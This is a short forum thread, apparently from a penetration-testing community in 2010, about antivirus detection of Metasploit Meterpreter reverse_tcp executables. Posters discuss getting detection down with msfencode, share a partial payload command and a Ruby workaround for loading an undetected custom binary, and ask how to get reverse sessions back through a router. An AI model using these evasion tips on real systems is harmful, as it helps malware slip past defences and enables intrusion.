Results 1 to 5 of 5

Thread: Meterpreter exe's now detected

  1. 01-30-2010, 06:05 AM #1
    b3r00tb4ck
    b3r00tb4ck is offline
    Junior Member
    Join Date
    Jul 2009
    Posts
    37

    Default Meterpreter exe's now detected

    Good or bad news depending on who cares, but the meterpreter reverse_tcp payload embeded in an exe or shellcode within another exe is now detected:
    Virustotal. MD5: c32f921f597c7f82f4b48a7604b6d860 Trojan Horse Trojan.Vilsel.omg Trojan:W32/Rozena.gen!A

    also this was created with no encoders, although i dont think they would help.
  2. 02-01-2010, 09:45 PM #2
    collins.fax
    collins.fax is offline
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default Meterpreter

    It is still possible to compile a relatively undetected copy of meterpreter using msfencode. The one I have is only being flagged by 2 on virustotal right now. (Microsoft,Trojan:Win32/Swrort.A & Symantec, Suspicious.Insight)

    However, my question to anyone out there is this:

    how can I specify to use my custom meterpreter as a payload for an exploit in Metasploit?

    for example. I was testing the java_signed_applet module today and the executable that is run from the jar file kept flagging a/v. I would like to specify my own version of meterpreter instead that does not get flagged.

    i have searched for an answer and tried variations of the following:
    set PAYLOAD windows/meterpreter/reverse_tcp LHOST xx LPORT xx R | msfencode xx xx xx xx
    but of course it doesnt like that value as the actual PAYLOAD.. any help would be appreciated
  3. 02-02-2010, 07:39 PM #3
    collins.fax
    collins.fax is offline
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    to accomplish what i was asking in the post above, here is a work around by editing the actual ruby file:

    data = open("path/filename", "rb") {|io| io.read}

    where filename is the copy of the undetected meterpreter executable and most frequently data is the payload variable
  4. 02-04-2010, 05:06 AM #4
    mokakola
    mokakola is offline
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    1

    Default hey collins.fax

    hello, i saw ur post talking about meterpreter detection, man i would appreciate if yould tell me the commands of msfencode that you used to get 2 AV's detected at virus total, thanks
  5. 02-04-2010, 04:58 PM #5
    pentest09
    pentest09 is offline
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default

    Hi Fellaz,

    I've successfully exploited various win xp machines on my lan in lab environment using SET and aurora exploit but that is locally, how can these exploitz be used against other side of router on MY remote office pcs (ie.) want to try and pentest outside the local lan, will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same lan. if not how can it be acheived?

    Pentest office : attack machine ip 192.168.0.8 public ip 96.xx.xx.xx
    Remote office different lan: victim ip 192.168.1.9 public ip 92.xx.xx.xx
    MY OWN btw victim machine both owned my myself.

    both ip addresses differ 92.xx.xx.xx and 96.xx.xx.xx so how to metasploit past my remote router into the lan side.

    As stated I own both networks but not Pwnd yet.
    Googled and not found a thing apart from changing LHOST to public ip but thats just the router isnt it?

    Kind Regardz DEE
    Edit/Delete Message
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules